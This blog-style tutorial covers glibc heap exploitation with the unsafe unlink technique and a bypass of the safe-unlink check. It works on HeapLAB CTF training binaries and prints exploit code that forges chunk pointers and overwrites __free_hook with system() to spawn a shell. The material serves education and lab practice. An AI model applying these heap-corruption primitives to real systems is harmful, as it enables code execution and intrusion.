Linux Heap Exploitation: Unsafe Unlink

Posted on Jan 14, 2025

Table of contents:

Unsafe Unlink

Introduction

The “Unsafe Unlink” technique is a heap exploitation attack that was once quite common. It involves manipulating the unlink macro in malloc.c to remove a chunk from a bin. This attack exploits the pointer manipulation done in the unlink macro, which can lead to arbitrary code execution or other malicious activities.

When we free allocated unsorted bin, it will be freed from a doubly linked list.

A doubly linked list is a type of data structure that consists of a sequence of elements, where each element (or node) contains three parts:

Data: The value or information stored in the node.
Next Pointer (fd): A reference to the next node in the sequence.
Previous Pointer (bk): A reference to the last node in the sequence.

This structure allows traversal in both directions—forward and backward—making it more flexible than a singly linked list, which can only be traversed in one direction. Here’s a simple visual representation:

Each node is connected to its FORWARD fd and BACKWARD bk, enabling efficient insertion and deletion of nodes from both list ends.

Unsortedbin structure:

Three allocated memory chunks with size 0x88 looks like this:

As you can see, the 0x91, 0x90 is the chunk_size 0x1 is the prev_inuse flag indicating that the previous chunk is in use.

Let’s free the first chunk on index 0

First, we notice that the first two quadwords ( 0x00007ffff7dd4b78 0x00007ffff7dd4b78 ) of its user data are repurposed as forward fd and backward bk pointers, which the unsorted command in pwndbg can check.

The second thing you notice is the two 0x90 quadwords at the address 0x55555555c090; the first one indicates the prev_size of the previously freed chunk which matches its size field; the second one indicates the address of the second chunk with index 1, which changes the prev_inuse flag to 0 because the previous chunk (with index 0) be freed.

Unsortedbins can change shape, let’s move on and free one more chunk with index 1

After two memory allocations were freed, we can see that at address 0x55555555c120, the memory allocator has coalesced the freed blocks into one single allocation. This indicates that the memory management system has effectively merged adjacent free chunks, and it also proves prev_size 0x120.

I think we get the point about how unsortedbin works, and how unlinking aka freeing works.

What is the issue then?

We have the CTF-style binary to demonstrate how this exploitation works. First, we run itself

~/unsafe_unlink > ./unsafe_unlink                                            
===============
|   HeapLAB   |  Unsafe Unlink
===============

puts() @ 0x7f3c3e4395a0
heap @ 0x558b60f0f000

1) malloc 0/2
2) edit
3) free
4) quit
>

We can call malloc only twice, and only for small chunks—excluding fast sizes (120 < bytes <= 1000). When we invoke malloc two times, it will allocate two small chunks. And option two shows, that we can edit the data section of these chunks, we can manipulate their content strategically. The main issue is the overflowing data section of chunks. If we can edit means we can also overflow data to the next chunk also,if we overflow the first chunk, it fills the header section of the second chunk’s also.

Before overflow:

After overflow:

By filling the first chunk with 'A' we successfully overwrite prev_size[1] field, and the chunk_size[2] field along with the prev_inuse[2] flag.

This is the right structure for unsortedbin with the below code:

a = malloc(0x88); b = malloc(0x88); free(a);

Our primary goal is to achieve an arbitrary write primitive. To do this, we can craft a fake chunk and carefully manipulate its metadata. Specifically, we write fake fd and bk pointers pointing to controlled addresses, along with a fake prev_size value in data section of chunk A. Additionally, we clear the prev_inuse flag of the next chunk, making the fake chunk appear as though it is part of a freed unsortedbin, even though it is not actually freed.

When the subsequent chunk is freed, the unlink operation will process the metadata of our fake chunk as if it were valid. This allows us to overwrite arbitrary memory addresses with controlled values, effectively achieving an arbitrary write primitive.

Exploitation stages

Overflow and overwrite with fake metadata.
Overwrite __free_malloc metadata with payload address; when we free the chunk, it triggers our payload.
Place the shellcode and run.

Constructing Payload

fake_fd = __free_hook - 0x18 (we will write our bk address by fake_fd pointer to __free_hook, and 0x18 is the offset in the representation of unsortedbin chunk structure (0x18 offset = prev_size + size + fake_fd))
fake_bk = heap + 0x20 = 0x0000555555603020 (it points to data section 'A');
a = malloc(0x88); b = malloc(0x88); edit(a, p64(fd) + p64(bk) + b'A' * 0x70 + p64(0x90) + p64(0x90))

This the fake chunk representation in-memory structure

We can observe our fake fd and bk pointers at the start of chunk A, alongside chunk B’s cleared prev_inuse flag. Additionally, we have a valid prev_size field that malloc can interpret and use. When chunk B is freed, malloc will examine its prev_inuse flag, notice it is cleared, and attempt to consolidate chunk B with chunk A.

During this process, malloc reads our fake prev_size field, subtracts it from chunk B’s address, and calculates the start of chunk A. Believing chunk A to be valid, it proceeds to unlink it from the free list where it appears to be linked. At this point, malloc performs the unlink operation on our fake fd and bk pointers, enabling us to exploit the reflected write primitive.

Specifically, malloc will follow the fd pointer to what it assumes is another chunk and overwrite that chunk’s bk with our fake bk.

[1] - offset prev_size

[2] - offset chunk_size|prev_inuse

[3] - offset fd

[4] - __free_hook address, which is overwritten to our fake bk, which points to heap chunk A’s data section.

Similarly, it will follow the bk pointer to another presumed chunk and overwrite that chunk’s fd with our fake fd. This sequence provides us with a powerful arbitrary write primitive, allowing us to control memory writes at specific addresses, a crucial step in heap exploitation.

[1] chunk A’s fake fd pointer

[2] chunk A’s fake bk pointer

[3] after 16 offsets with '0x41' , estimated fd overwritten with fake fd

Shellcode

The Shellcode part is easy, the binary is not compiled with NX flags that’s why we can place the our shellcode in chunks A data section and run.

Safe Unlink

Nowadays unlink attack exploitation is present even with some security patches:

We know how unlink process works in unsafe unlink:

FD = P->fd;
BK = P->bk;
FD->bk = BK;
BK->fd = FD;

First, it identifies the victim’s (victim is the unlinking chunk or p in the source code) forward FD and backward bk pointers. Then, it goes to the forward-pointed chunk and replaces this chunk’s bk pointer with the victim’s pointer bk, and it goes to the back-pointed chunk and replaces this chunk’s fd pointer with the victim’s fd pointer. By this algorithm, the middle chunk, aka the unlinking chunk, will be skipped in the linked list and added to the freed chunk list.

This demonstrates how unsafe unlink works, let’s check how safe unlink works after added a few mitigations

Safe unlinking checks. Published in GLIBC version: 2.3.4

--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -280,6 +280,9 @@ extern "C" {
 /* For uintptr_t.  */
 #include <stdint.h>
 
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
 /*
   Debugging:
 
@@ -1498,6 +1501,7 @@ static size_t   mUSABLe(Void_t*);
 static void     mSTATs(void);
 static int      mALLOPt(int, int);
 static struct mallinfo mALLINFo(mstate);
+static void malloc_printf_nc(int action, const char *template, ...);
 
 static Void_t* internal_function mem2mem_check(Void_t *p, size_t sz);
 static int internal_function top_check(void);
@@ -1966,6 +1970,9 @@ typedef struct malloc_chunk* mbinptr;
 #define unlink(P, BK, FD) {                                            \
   FD = P->fd;                                                          \
   BK = P->bk;                                                          \
+  if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                \
+    malloc_printf_nc (check_action,                                    \
+                     "corrupted double-linked list at %p!\n", P);     \
   FD->bk = BK;                                                         \
   BK->fd = FD;                                                         \
 }
@@ -2327,6 +2334,15 @@ __malloc_ptr_t weak_variable (*__memalign_hook)
 void weak_variable (*__after_morecore_hook) __MALLOC_P ((void)) = NULL;
 
 
+/* ---------------- Error behavior ------------------------------------ */
+
+#ifndef DEFAULT_CHECK_ACTION
+#define DEFAULT_CHECK_ACTION 3
+#endif
+
+static int check_action = DEFAULT_CHECK_ACTION;
+
+
 /* ------------------- Support for multiple arenas -------------------- */
 #include "arena.c"
 
@@ -4164,21 +4180,7 @@ _int_free(mstate av, Void_t* mem)
        here by accident or by "design" from some intruder.  */
     if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0))
       {
-       if (check_action & 1)
-         {
-#ifdef _LIBC
-           _IO_flockfile (stderr);
-           int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
-           ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
-#endif
-           fprintf (stderr, "free(): invalid pointer %p!\n", mem);
-#ifdef _LIBC
-           ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
-           _IO_funlockfile (stderr);
-#endif
-         }
-       if (check_action & 2)
-         abort ();
+       malloc_printf_nc (check_action, "free(): invalid pointer %p!\n", mem);
        return;
       }
 
@@ -5404,6 +5406,35 @@ int mALLOPt(param_number, value) int param_number; int value;
 */
 
 
+/* Helper code.  */
+
+static void
+malloc_printf_nc(int action, const char *template, ...)
+{
+  if (action & 1)
+    {
+#ifdef _LIBC
+      _IO_flockfile (stderr);
+      int old_flags2 = ((_IO_FILE *) stderr)->_flags2;
+      ((_IO_FILE *) stderr)->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+#endif
+
+      va_list ap;
+      va_start (ap, template);
+
+      vfprintf (stderr, template, ap);
+
+      va_end (ap);
+
+#ifdef _LIBC
+      ((_IO_FILE *) stderr)->_flags2 |= old_flags2;
+      _IO_funlockfile (stderr);
+#endif
+    }
+  if (action & 2)
+    abort ();
+}
+
 #ifdef _LIBC
 # include <sys/param.h>

The main mitigation is if (__builtin_expect (FD->bk != P || BK->fd != P, 0)); if the next chunk’s bk pointer doesn’t point back to the victim chunk OR the previous chunk’s fd pointer doesn’t point to the victim chunk as next chunk, it fails and prints error "corrupted double-linked list at chunk!"

It’s best to observe these examples in action by analyzing the behavior directly with the task binary.

Task

Overview of the task we such heap overflow bug and library (glibc 2.30 no-tcache).

There are 5 functions in binary malloc, edit, free, target, and quit. you can only place small chunks - excluding fast sizes (120 < bytes <= 1000).

./safe_unlink                                                                              
	===============
	|   HeapLAB   |  Safe Unlink
	===============
	
	puts() @ 0x7fd2cf5bbaf0
	
	1) malloc 0/2
	2) edit
	3) free
	4) target
	5) quit
	> 1
	size: 0x100000000
	small chunks only - excluding fast sizes (120 < bytes <= 1000)
	
	1) malloc 0/2
	2) edit
	3) free
	4) target
	5) quit
	>

As you can see, we don’t have the leak address of the heap. To place the shellcode like the previous unsafe unlink binary. Let’s check how mitigations work with example pointers.

First, we will malloc two chunks with the same size 0x88, edit the first chunk with data, and overflow till the next’s chunk header quadwords, overwriting the next chunk quadwords with forged prev_size and fake_size.

# Request 2 small chunks.
chunk_A = malloc(0x88)
chunk_B = malloc(0x88)

# Prepare fake chunk metadata.
fd = libc.sym.__free_hook #
bk = libc.sym.system
prev_size = 0x90
fake_size = 0x90
edit(chunk_A, p64(fd) + p64(bk) + p8(0)*0x70 + p64(prev_size) + p64(fake_size))

We successfully added forged fk and bk pointers.
Forged prev_size in the unlinking process subtracts the 0x90 address to identify the header of the first chunk. The second 0x90 is the size of the next chunk with the prev_inuse flag 0x0, which means the first chunk is already freed.

Unlink (free) the second chunk:

1) malloc 2/2
2) edit
3) free
4) target
5) quit
> $ 3
index: $ 1
corrupted double-linked list
$

Our mitigation is triggered, and it sends SIGABRT signal.

Yes, we triggered the same mitigation that was explained above. It goes to the chunk with our forged pointer fd (0x00007ffff7dd2e20) and could not find any bk pointer which will point back to our chunk

Of course, it goes to the previous chunk with our forged bk (0x00007ffff7a5f200) pointer, and can not find a pointer fd that points to our chunk.

Let’s reverse the binary: what interesting things are there?!

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int index; // [rsp+14h] [rbp-Ch]
  unsigned __int64 n; // [rsp+18h] [rbp-8h]
  unsigned __int64 na; // [rsp+18h] [rbp-8h]
  unsigned __int64 nb; // [rsp+18h] [rbp-8h]

  setvbuf(stdout, 0LL, 2, 0LL);
  puts("\n===============");
  puts("|   HeapLAB   |  Safe Unlink");
  puts("===============\n");
  printf("puts() @ %p\n", &puts);
  index = 0;
  while ( 1 )
  {
    printf("\n1) malloc %u/%u\n", index, 2LL);
    puts("2) edit");
    puts("3) free");
    puts("4) target");
    puts("5) quit");
    printf("> ");
    switch ( read_num() )
    {
      case 1uLL:
        if ( index > 1 )
        {
          puts("maximum requests reached");
        }
        else
        {
          printf("size: ");
          n = read_num();
          if ( n <= 0x78 || n > 0x3E8 )
          {
            puts("small chunks only - excluding fast sizes (120 < bytes <= 1000)");
          }
          else
          {
            m_array[index].user_data = (char *)malloc(n);
            if ( m_array[index].user_data )
              m_array[index++].request_size = n;
            else
              puts("request failed");
          }
        }
        continue;
      case 2uLL:
        printf("index: ");
        na = read_num();
        if ( na >= index )
          goto LABEL_15;
        if ( m_array[na].user_data )
        {
          printf("data: ");
          read(0, m_array[na].user_data, m_array[na].request_size + 8);
        }
        else
        {
          puts("cannot edit a free chunk");
        }
        break;
      case 3uLL:
        printf("index: ");
        nb = read_num();
        if ( nb >= index )
        {
LABEL_15:
          puts("invalid index");
        }
        else if ( m_array[nb].user_data )
        {
          free(m_array[nb].user_data);
          m_array[nb].user_data = 0LL;
        }
        else
        {
          puts("this chunk was already freed");
        }
        break;
      case 4uLL:
        printf("\ntarget: %s\n", target);
        break;
      case 5uLL:
        exit(0);
      default:
        continue;
    }
  }
}

One of malloc’s small optimizations is that it doesn’t directly keep track of all allocated chunks. Instead, it maintains pointers to the top chunks and free chunks within its arenas. When a chunk is allocated to a thread, it’s the thread’s responsibility to hold onto the pointer to that chunk until it’s returned to malloc using functions like free().

This means a program must store pointers to allocated chunks somewhere, such as on the stack, in the data section, or even on the heap itself. In the vulnerable binaries we’ve worked with so far, these chunk pointers are stored on the stack. Unfortunately, without a stack leak, we can’t access or modify these pointers, making them out of reach.

In the process of memory allocation in binary, the allocated memory is assigned to the user_data field of a specific structure in the m_array.

The m_array structure manages pointers, each referencing allocated malloc chunks’ data sections.

m_array is located in binary, binary compiled without PIE, by checks command, we can see there is NO PIE. It means our binary is position-independent, which means the address of m_array is static and will not change in the runtime.

You might wonder why this address isn’t equal to 0x603000, which is the pointer to the header of the first malloc. The reason is that it points to the user data of the first chunk instead. However, we can manipulate this behavior to bypass the mitigation.

By crafting a fake header, we can adjust the pointer offset so that it aligns correctly. As a result, it will point directly to 0x603010. Now, let’s modify the payload accordingly.

chunk_A = malloc(0x88)
chunk_B = malloc(0x88)

# Prepare fake chunk metadata.
fd = elf.sym.m_array - 0x18 # fd->bk == p
bk = elf.sym.m_array - 0x10 # bk->fd == p
prev_size = 0x80
fake_size = 0x90
fake_header = p64(0) + p64(0x81)
edit(chunk_A, fake_header + p64(fd) + p64(bk) + p8(0)*0x60 + p64(prev_size) + p64(fake_size))

This is how fake header looks like

Let’s break down the logic step by step:

We begin by freeing the second chunk. The thread then checks the prev_inuse bit, which is set to 0x90 quadwords and the last byte of this quadword is 0x0. This indicates that the previous chunk is not in use, free.
Because the previous chunk is marked as unused, the thread subtracts the prev_size value (0x80) from the current chunk’s address. This adjustment leads the thread to the fake header of our first chunk. If prev_size is greater than size, the process continues successfully to the next step.
The fd pointer 0x602048, is checked. It points to the fake forward chunk, where its bk pointer (0x603010) is verified to ensure it points back to our first allocated chunk. This check passes.
Similarly, the bk pointer 0x602050, is examined. It points to the fake backward chunk, and its fd pointer (0x603010) is checked to confirm it points forward to our first allocated chunk. This check also passes.

With all validations completed, the mitigation is successfully bypassed. And we did arbitiry write we changed m_array ’s first chunk data pointer to our fd pointer address.

Before free:

After free:

How fd 0x602048 address appear instead of bk address (as we see in the unsafe unlink example)?

If you recall how the unlink operation works, in our case, we adjust relatively the fd and bk pointers so that only one address (0x603010) is changed during the process. Here’s a breakdown of the logic:

The fd and bk pointers are set as follows:
- FD = P->fd
- BK = P->bk
During the unlink operation:
- First, overwrite FD->bk to point to p->bk.
- Second, BK->fd be overwritten to point to p->fd.

The Last operation is the final swap, primarily writing to the fd pointers. This is why only the fd pointers are ultimately modified during the process and offsets offset(FD->bk) = offset(BK->fd).

we changed m_array[na].user_data address, it means in the next edit() we can manipulate which address to arbitiry write.

fd = elf.sym.m_array - 0x18 # fd->bk == p
bk = elf.sym.m_array - 0x10 # bk->fd == p
prev_size = 0x80
fake_size = 0x90
fake_header = p64(0) + p64(0x81)
edit(chunk_A, fake_header + p64(fd) + p64(bk) + p8(0)*0x60 + p64(prev_size) + p64(fake_size))
free(chunk_B)
edit(chunk_A, p64(0) * 3 + p64(libc.sym.__free_hook - 8))
edit(0, b"/bin/sh\0" + p64(libc.sym.system))
free(0)

To execute the exploit, we start by freeing the “victim” chunk, which triggers a backward consolidation with the “overflow” chunk. This manipulation allows us to set up the heap for further exploitation. After unlinking, the first entry in m_array is adjusted to point 0x18 bytes before m_array itself. Using the “edit” functionality, we overwrite this entry with the address of __free_hook - 8, carefully positioning it for our payload. Next, we use the “edit” option again to write the string “/bin/sh” just before the free hook and overwrite the free hook itself with the address of system(). Finally, freeing the first entry in m_array, which now holds the address of the “/bin/sh” string, triggers a call to system("/bin/sh"), effectively gaining a shell.